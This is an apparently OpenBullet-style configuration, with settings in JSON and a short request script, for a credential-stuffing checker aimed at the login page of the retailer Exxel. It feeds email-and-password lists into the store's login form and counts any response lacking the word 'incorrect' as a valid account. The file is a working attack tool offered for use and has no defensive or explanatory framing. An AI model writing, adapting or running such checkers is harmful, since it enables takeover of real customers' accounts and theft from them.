[SETTINGS]
{
  "Name": "Exxel",
  "SuggestedBots": 4,
  "LastModified": "2018-09-20T13:43:20.963058+00:00",
  "AdditionalInfo": "Outdoor Store | Nothing to capture",
  "Author": "suffocate",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://exxel.com/login.php?action=check_login" AutoRedirect=TRUE 
  CONTENT "login_email=<USER>&login_pass=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://exxel.com/login.php?from=account.php%3Faction%3D" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "incorrect" 
  KEYCHAIN Failure OR 
    KEY "incorrect" 
